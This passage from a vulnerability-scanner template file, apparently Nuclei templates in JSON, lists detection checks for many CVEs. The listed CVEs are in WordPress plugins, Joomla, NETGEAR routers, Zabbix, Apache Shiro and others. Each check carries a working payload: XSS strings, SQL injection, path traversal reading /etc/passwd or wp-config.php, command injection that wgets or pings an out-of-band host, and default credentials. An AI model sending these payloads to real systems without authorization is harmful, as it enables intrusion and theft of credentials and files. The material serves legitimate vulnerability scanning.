Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000141","info":{"name":"WordPress Page Layout builder v1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000139","info":{"name":"WordPress Infusionsoft Gravity Forms <=1.5.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><\"","input type=\"text\" name=\"ContactId\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10134","info":{"name":"Zabbix - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error in query [INSERT INTO profiles (profileid, userid","You have an error in your SQL syntax"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000148","info":{"name":"WordPress S3 Video <=0.983 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script><\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10033","info":{"name":"WordPress PHPMailer < 5.2.18 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n","POST /wp-login.php?action=lostpassword HTTP/1.1\nHost: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nwp-submit=Get+New+Password&redirect_to=&user_login={{username}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wp-login.php?checkemail=confirm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2016-1000130","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6195","info":{"name":"vBulletin <= 4.2.3 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["type=dberror"]},{"type":"status","status":[200,503],"condition":"or"}]}]},{"id":"CVE-2016-1000133","info":{"name":"WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7834","info":{"name":"Sony IPELA Engine IP Camera - Hardcoded Account","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command/prima-factory.cgi"],"headers":{"Authorization":"Bearer cHJpbWFuYTpwcmltYW5h"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["gen5th","gen6th"],"condition":"or"},{"type":"status","status":[204]}]}]},{"id":"CVE-2016-10956","info":{"name":"WordPress Mail Masta 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd","{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2016-1000135","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000149","info":{"name":"WordPress Simpel Reserveren <=3.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10973","info":{"name":"Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"tab = alert(document.domain);\")","contains(body_2, \"Brafton Article Loader\")"],"condition":"and"}]}]},{"id":"CVE-2016-10367","info":{"name":"Opsview Monitor Pro - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2016-0957","info":{"name":"Adobe AEM Dispatcher <4.15 - Rules Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/console?.css"],"headers":{"Authorization":"Basic YWRtaW46YWRtaW4K"},"matchers-condition":"and","matchers":[{"type":"word","words":["Adobe","java.lang","(Runtime)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10960","info":{"name":"WordPress wSecure Lite < 2.4 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"],"body":"wsecure_action=update&publish=\";} header(\"{{name}}: CVE-2016-10960\"); class WSecureConfig2 {var $test=\"","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["{{name}}: CVE-2016-10960"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000136","info":{"name":"WordPress heat-trackr 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000152","info":{"name":"WordPress Tidio-form <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10993","info":{"name":"ScoreMe Theme - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10924","info":{"name":"Wordpress Zedna eBook download <1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10368","info":{"name":"Opsview Monitor Pro - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin_username={{username}}&login_password={{password}}&login=&back=//www.interact.sh&app=OPSVIEW\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2016-1000134","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000126","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7981","info":{"name":"SPIP <3.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10940","info":{"name":"WordPress zm-gallery plugin 1.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200","contains(body_2, \"[zm_gallery id=\")","contains(body_2, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")","!contains(body_3, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")"],"condition":"and"}]}]},{"id":"CVE-2016-3978","info":{"name":"Fortinet FortiOS  - Open Redirect/Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redir=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2016-5649","info":{"name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","severity":"critical"},"requests":[{"raw":["GET /BSW_cxttongr.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Smart Wizard Result</title> "]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<b>Success \"([a-z]+)\""],"part":"body"}]}]},{"id":"CVE-2016-1555","info":{"name":"NETGEAR WNAP320 Access Point Firmware - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /boardDataWW.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmacAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2016-1000132","info":{"name":"WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4437","info":{"name":"Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: rememberMe={{base64(concat(base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"),aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"kPH+bIxk5D2deZiIxcaaaA==\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"))))}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2016-1000140","info":{"name":"WordPress New Year Firework <=1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000142","info":{"name":"WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000128","info":{"name":"WordPress anti-plagiarism <=3.60 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000154","info":{"name":"WordPress WHIZZ <=1.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4977","info":{"name":"Spring Security OAuth2 Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unsupported response types: [978015547]"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2016-1000131","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6277","info":{"name":"NETGEAR Routers - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000138","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7552","info":{"name":"Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/logoff.cgi"],"headers":{"Cookie":"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Memory map"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000146","info":{"name":"WordPress Pondol Form to Mail <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-2389","info":{"name":"SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10108","info":{"name":"Western Digital MyCloud NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"WDMyCloud\")","contains(interactsh_protocol, \"dns\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2008-4764","info":{"name":"Joomla! <=2.0.0 RC2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-7269","info":{"name":"UC Gateway Investment SiteEngine v5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api.php?action=logout&forward=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-6172","info":{"name":"Joomla! Component RWCards 3.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6222","info":{"name":"Joomla! ProDesk 1.0/1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6465","info":{"name":"Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webshell4/login.php?errcode=0&login=\\%22%20onfocus=alert(document.domain);%20autofocus%20\\%22&err=U"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\" onfocus=alert(document.domain); autofocus","Please enter login name &amp; password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2398","info":{"name":"AppServ Open Project <=2.5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=confirm('xss')>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1061","info":{"name":"WordPress Sniplets <=1.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6668","info":{"name":"nweb2fax <=0.2.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd","{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1059","info":{"name":"WordPress Sniplets 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6080","info":{"name":"Joomla! ionFiles 4.4.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6982","info":{"name":"Devalcms 1.4a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sub menu for: <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2008-5587","info":{"name":"phpPgAdmin <=4.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-4668","info":{"name":"Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2650","info":{"name":"CMSimple 3.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1547","info":{"name":"Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/exchweb/bin/redir.asp?URL=https://interact.sh","{{BaseURL}}/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-4592","info":{"name":"WP Planet <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["WP Planet"]},{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2962","info":{"name":"Belkin N150 Router 1.00.08/1.00.09 - Path 